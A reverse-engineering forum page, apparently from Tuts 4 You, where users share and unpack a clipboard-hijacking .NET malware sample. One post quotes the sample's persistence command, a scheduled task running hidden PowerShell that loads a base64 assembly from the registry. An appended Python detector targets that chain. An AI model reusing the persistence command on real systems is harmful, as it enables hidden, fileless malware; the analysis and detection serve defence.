Tuts 4 You

Forums

  1. Community Discussions

    1. Terms, Privacy Policy & Frequently Asked Questions (151,092 visits to this link)
       Very important! Please read before signing up and posting...
    2. General Discussions and Off Topic
       General and off-topic conversations and discussions here... (12.9k posts)
    3. Artscene Community
       Share graphic, ASCII, module, demo, intro ideas and works... (7.4k posts)
    4. Site Bug Reports and Feedback
       Bugs, feedback and ideas regarding this site... (2.2k posts)

  2. Reverse Code Engineering

    1. Challenge of Reverse Engineering
       Try a challenge or contribute your own, any platform or operating system... (13.3k posts)
    2. Hardware Reverse Engineering
       Reverse engineering of circuitry hardware and firmware... (191 posts)
    3. Network Security
       Discussions on network security, holes, exploits and other issues... (454 posts)
    4. Malware Reverse Engineering
       Debugging, disassembling and documenting interesting malware... (1.5k posts)
    5. Reverse Engineering Articles
       Share an interesting blog, news page or other RE related site... (1.9k posts)
    6. Employment and Careers
       Discussions on employment and career paths in the industry... (157 posts)

  3. Developers Forums

    1. Programming and Coding
       Programming and coding tips, help and solutions... (12k posts)
    2. Programming Resources
       Share an interesting blog, news page or other resource... (307 posts)
    3. Software Security
       Securing your software against reverse engineering... (764 posts)

  4. Community Projects

    1. Scylla Imports Reconstruction
       Development and support forum for the Scylla project... (497 posts)
    2. x64dbg
       An open-source x64/x32 debugger for Windows... (1.2k posts)
    3. Future Community Projects
       Looking for support and interested partners for a future project? (130 posts)
    4. Community Projects Archive
       Old and inactive projects moved to long term support... (803 posts)
  • Member Statistics

    Total Members: 15,268
    Most Online: 7,713
    Newest Member: daredevil
  • Posts

    • Darth Blue
      Hello guys. The command `bphws $abc, 'r'` puts a hardware breakpoint on execute. But what I want to do via a command is `breakpoint > on access > dword`. You know you can do this by right-clicking in the **DUMP** window and selecting `breakpoint > on access > dword`. I have searched: Google, the x64dbg documentation, the tuts4you forums. Unfortunately I couldn't find a way to do that. Did I miss something? P.S. I need this because I am writing a script. Thank you :)
    • BlackHat
      Unpacked this crap LOL. Here you go with the file: Kthmngiucgrhcdpxszzwg_BH_unp.dll
    • JoseCmanXDll
      Yep, he tried to bypass Windows Defender to make the payload run in memory by converting his payload to base64, I see (based on the PowerShell command). With those strong packers I don't think it's possible to unpack this crap.
    • Apuromafo
      Some simple notes, for analysis only:
      step 0: exe in dnSpy
      step 1: resource extract and save as .zip
      step 2: the .exe in that zip is the program (malware), a .NET dll packed with Microsoft Visual C# / Basic.NET - IntelliLock v.1.5.x.0 (.NET Reactor) (Kthmngiucgrhcdpxszzwg.dll). There it is executed with something like this:
      `"C:\Windows\System32\schtasks.exe" /create /sc minute /mo 10 /tn Fvupm /tr "powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -NoExit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software\Fvupm\).Xcjuab)).EntryPoint.Invoke($Null,$Null)"`
      virustotal: https://www.virustotal.com/gui/file/5694a409003d8f855a17761d9ebce7cfd0f30490fa5340d9a3e1b55ce75cd5be/behavior
      Processes Created: C:\Windows\System32\schtasks.exe [same schtasks command line as above]
      Shell Commands: schtasks /create [same schtasks command line as above]
      Processes Terminated: C:\Windows\System32\schtasks.exe [same schtasks command line as above]
      Processes Tree:
        2120 - Unpack me.exe
        2628 - C:\Windows\System32\schtasks.exe /create [same schtasks command line as above]
      Packer? VMProtect + IntelliLock, or some obfuscator like ILProtector + IntelliLock.
      Best regards, Apuromafo
    • JoseCmanXDll
      This malware belongs to some famous coders; he sells it for over $100. I somehow managed to steal it from someone who bought it. It's malware that uses PowerShell; it only accesses the clipboard to replace it but doesn't steal data. I don't know more about it. The packer had me so confused; unpack it if you can. Edit: if it gets unpacked I will share the seller's website! Unpack me.rar
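The persistence chain Apuromafo pulled out of the VirusTotal behaviour report (a scheduled task that runs every 10 minutes and launches a hidden PowerShell which base64-decodes a .NET assembly stored in `HKCU:\Software\Fvupm\Xcjuab` and loads it reflectively) is worth having a detection for, since the assembly never touches disk. Below is an added example, not code from this thread, from the sample, or from the forum: a small Python detector that runs over constructed Sysmon-style process-creation records, flags a `schtasks /create` whose action combines `Get-ItemProperty`, `FromBase64String` and `Assembly]::Load`, extracts the task name, schedule and registry location, and then checks that the value stored there decodes to a PE before it is handed to dnSpy. The record format, the regexes, the `FAKE_REGISTRY` dictionary and the constructed `FAKE_PE` blob are all assumptions for the demo; the first command line in `SAMPLE_EVENTS` is the one quoted in the post.

```python
"""Detect the schtasks -> hidden PowerShell -> registry-resident .NET
assembly persistence chain from the VirusTotal report quoted above.
Added example for this thread, not code from the forum or the sample.
Telemetry is constructed: Sysmon-style process-creation records written
as "pid|ppid|image|commandline"."""
import base64
import re
from dataclasses import dataclass
from typing import Optional

# Constructed records.  The first command line is the one quoted in the
# post; the other two are benign noise the rule must not flag.
SAMPLE_EVENTS = [
    "2628|2120|C:\\Windows\\System32\\schtasks.exe|schtasks /create /sc minute /mo 10 "
    "/tn Fvupm /tr \"powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden "
    "-NoExit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String("
    "(Get-ItemProperty HKCU:\\Software\\Fvupm\\).Xcjuab)).EntryPoint.Invoke($Null,$Null)\"",
    "3100|700|C:\\Windows\\System32\\schtasks.exe|schtasks /create /sc daily "
    "/tn NightlyBackup /tr \"C:\\Tools\\backup.exe\"",
    "3205|700|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|"
    "powershell -NoProfile -Command Get-Process",
]

# Constructed stand-in for HKCU: a minimal blob with a valid MZ/PE layout
# (e_lfanew at 0x3C pointing at "PE\0\0"), as the real value would hold.
FAKE_PE = b"MZ" + b"\x00" * 58 + (0x40).to_bytes(4, "little") + b"PE\x00\x00" + b"\x00" * 16
FAKE_REGISTRY = {"HKCU:\\Software\\Fvupm": {"Xcjuab": base64.b64encode(FAKE_PE).decode()}}


@dataclass
class LoaderTask:
    pid: int
    task_name: str
    schedule: str      # e.g. "minute/10" = every 10 minutes
    reg_key: str
    reg_value: str


# Assumed patterns for this demo; adjust to your telemetry's quoting.
TASK_NAME = re.compile(r"/tn\s+(\S+)", re.I)
SCHEDULE = re.compile(r"/sc\s+(\w+)(?:\s+/mo\s+(\d+))?", re.I)
REG_READ = re.compile(r"Get-ItemProperty\s+(HK\w+:[^)\s]*)\)\.(\w+)", re.I)
# All three together mean "decode a registry value and run it as an
# assembly"; each alone is far too common in admin scripting to alert on.
LOADER_MARKERS = ("assembly]::load", "frombase64string", "get-itemproperty")


def parse_event(line: str):
    pid, ppid, image, cmd = line.split("|", 3)
    return int(pid), int(ppid), image, cmd


def classify(line: str) -> Optional[LoaderTask]:
    """Return a LoaderTask if the record is a schtasks /create whose
    action is a PowerShell registry-resident assembly loader."""
    pid, _ppid, image, cmd = parse_event(line)
    lc = cmd.lower()
    if not image.lower().endswith("schtasks.exe"):
        return None
    if "/create" not in lc or "powershell" not in lc:
        return None
    if not all(marker in lc for marker in LOADER_MARKERS):
        return None
    reg = REG_READ.search(cmd)
    tn = TASK_NAME.search(cmd)
    sc = SCHEDULE.search(cmd)
    schedule = "?"
    if sc:
        schedule = sc.group(1).lower() + (f"/{sc.group(2)}" if sc.group(2) else "")
    return LoaderTask(
        pid=pid,
        task_name=tn.group(1) if tn else "?",
        schedule=schedule,
        reg_key=reg.group(1).rstrip("\\") if reg else "?",
        reg_value=reg.group(2) if reg else "?",
    )


def scan(events):
    return [hit for hit in map(classify, events) if hit is not None]


def looks_like_pe(blob: bytes) -> bool:
    """Cheap PE sanity check before handing the blob to dnSpy."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(blob[0x3C:0x40], "little")
    return blob[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def recover_payload(registry, key: str, value: str) -> Optional[bytes]:
    """Base64-decode the stored assembly; on a live host read the value
    with winreg instead of this dict.  Returns None if it is not a PE."""
    try:
        blob = base64.b64decode(registry[key][value])
    except (KeyError, ValueError):
        return None
    return blob if looks_like_pe(blob) else None


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(f"pid {hit.pid}: task {hit.task_name!r} runs {hit.schedule}, "
              f"loads {hit.reg_key}\\{hit.reg_value}")
        blob = recover_payload(FAKE_REGISTRY, hit.reg_key, hit.reg_value)
        print("  payload is a PE:", blob is not None)
```

Requiring all three markers keeps the rule quiet on ordinary admin tasks (the `NightlyBackup` record is ignored), while the extracted key and value name tell a responder exactly where to pull the assembly from and which task to delete; write the recovered bytes to a file and open that in dnSpy rather than the packed dropper.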